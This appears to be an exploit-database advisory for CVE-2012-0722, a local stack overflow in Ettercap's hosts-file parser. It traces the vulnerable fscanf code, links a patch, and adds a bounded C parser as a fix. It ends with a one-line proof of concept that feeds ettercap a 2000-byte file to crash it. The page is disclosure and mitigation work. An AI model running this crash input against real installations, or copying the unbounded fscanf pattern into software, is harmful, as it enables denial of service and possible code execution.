Ettercap Stack overflow (CWE-121) - exploit.company
Vendor: Ettercap
By: Sajjad Pourali
CVSS: 3.3 (LOW)
CWE: 121 (Stack overflow)
Product Name: Ettercap
Affected Version From: 0.7.4 and earlier
Affected Version To: 0.7.5.1
Patch Exists: YES
Related CVE: CVE-2012-0722
CPE: ettercap
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2012

Ettercap Stack overflow (CWE-121)

Ettercap 0.7.5.1 and earlier contain a stack-based buffer overflow (CWE-121) in `src/ec_scan.c`: the `fscanf` call at lines 633-635 reads three whitespace-delimited fields with unbounded `%s` conversions into the fixed-size stack buffers `ip`, `mac` and `name`. A specially crafted input can therefore overwrite the stack, allowing an attacker to cause a denial of service (DoS) or potentially execute arbitrary code and gain control of the affected system. The issue has been assigned CVE-2012-0722.

Mitigation:

To mitigate this vulnerability, users are advised to apply the provided patch. The patch can be downloaded from the vendor's website at http://www.securation.com/files/2013/01/ec.patch.

Exploit-DB raw data:

Title: Ettercap Stack overflow (CWE-121)
References: CVE-2012-0722
Discovered by: Sajjad Pourali
Vendor: http://www.ettercap.sourceforge.net/
Vendor contact: 13-01-01 21:20 UTC (No response)
Solution: Using the patch
Patch: http://www.securation.com/files/2013/01/ec.patch

Local: Yes
Remote: No
Impact: low

Affected:
 - ettercap 0.7.5.1
 - ettercap 0.7.5
 - ettercap 0.7.4 and earlier
Not affected:
 - ettercap 0.7.4.1

---

Trace vulnerable place:

./include/ec_inet.h:27-44
enum {
   NS_IN6ADDRSZ            = 16,
   NS_INT16SZ              = 2,

   ETH_ADDR_LEN            = 6,
   TR_ADDR_LEN             = 6,
   FDDI_ADDR_LEN           = 6,
   MEDIA_ADDR_LEN          = 6,

   IP_ADDR_LEN             = 4,
   IP6_ADDR_LEN            = 16,
   MAX_IP_ADDR_LEN         = IP6_ADDR_LEN,

   ETH_ASCII_ADDR_LEN      = sizeof("ff:ff:ff:ff:ff:ff")+1,
   IP_ASCII_ADDR_LEN       = sizeof("255.255.255.255")+1,
   IP6_ASCII_ADDR_LEN      = sizeof("ffff:ffff:ffff:ffff:ffff:ffff:255.255.255.255")+1,
   MAX_ASCII_ADDR_LEN      = IP6_ASCII_ADDR_LEN,
};

./include/ec_resolv.h:42
#define MAX_HOSTNAME_LEN   64

./src/ec_scan.c:610-614
char ip[MAX_ASCII_ADDR_LEN];
char mac[ETH_ASCII_ADDR_LEN];
char name[MAX_HOSTNAME_LEN];


./src/ec_scan.c:633-635
if (fscanf(hf, "%s %s %s\n", ip, mac, name) != 3 ||
         *ip == '#' || *mac == '#' || *name == '#')
         continue;
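A hardened replacement for the `fscanf` pattern traced above, added here as an illustration (it is not the vendor's code and not the contents of ec.patch): it parses the same `ip mac name` lines into buffers of the same sizes, but rejects any token that would not fit, so a 2000-byte token like the PoC's is skipped instead of being written past the 47-byte `ip` buffer. Buffer sizes are the ones quoted from `ec_inet.h` and `ec_resolv.h`; the sample hosts file is constructed. Width-limited conversions such as `%46s` would also stop the write, but they silently truncate rather than reject.

```c
#include <stdio.h>
#include <string.h>
/* Buffer sizes from ec_inet.h / ec_resolv.h (values quoted on the page). */
#define ETH_ASCII_ADDR_LEN  (sizeof("ff:ff:ff:ff:ff:ff") + 1)                              /* 19 */
#define MAX_ASCII_ADDR_LEN  (sizeof("ffff:ffff:ffff:ffff:ffff:ffff:255.255.255.255") + 1)  /* 47 */
#define MAX_HOSTNAME_LEN    64

/* Copy the next space/tab-delimited token (never crossing a newline) into dst;
 * returns 0 when there is no token or it would not fit together with its NUL. */
static int next_token(const char **p, char *dst, size_t cap)
{
    const char *s = *p;
    while (*s == ' ' || *s == '\t') s++;
    size_t len = strcspn(s, " \t\r\n");
    if (len == 0 || len >= cap) return 0;
    memcpy(dst, s, len);
    dst[len] = '\0'; *p = s + len;
    return 1;
}
/* Same "ip mac name" and '#' comment semantics as the fscanf check in ec_scan.c,
 * except that an overlong field is rejected instead of overflowing its buffer. */
static int parse_host_line(const char *line, char *ip, char *mac, char *name)
{
    if (!next_token(&line, ip, MAX_ASCII_ADDR_LEN) ||
        !next_token(&line, mac, ETH_ASCII_ADDR_LEN) ||
        !next_token(&line, name, MAX_HOSTNAME_LEN))
        return 0;
    return *ip != '#' && *mac != '#' && *name != '#';
}
/* Walk an in-memory hosts file with the buffer sizes ec_scan.c declares on the stack;
 * returns how many lines were accepted. */
static int count_host_entries(const char *text)
{
    char ip[MAX_ASCII_ADDR_LEN], mac[ETH_ASCII_ADDR_LEN], name[MAX_HOSTNAME_LEN];
    int accepted = 0;
    for (const char *line = text; *line; ) {
        accepted += parse_host_line(line, ip, mac, name);
        const char *nl = strchr(line, '\n');
        line = nl ? nl + 1 : line + strlen(line);
    }
    return accepted;
}
/* Constructed sample: two valid entries, a comment, and a 2000-byte token. */
static int scan_constructed_sample(void)
{
    static char text[2200];
    int n = snprintf(text, sizeof text, "10.0.0.1 00:11:22:33:44:55 gateway\n"
                     "# comment line\n10.0.0.2 00:11:22:33:44:66 printer\n");
    memset(text + n, 'a', 2000);
    text[n + 2000] = '\n'; text[n + 2001] = '\0';
    return count_host_entries(text);   /* 2: the overlong line is skipped */
}
```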

---

PoC:

sudo ruby -e'puts"a"*2000' > overflow && sudo ettercap -T -j overflow

---

 + Sajjad Pourali
 + http://www.securation.com
 + Contact: sajjad[at]securation.com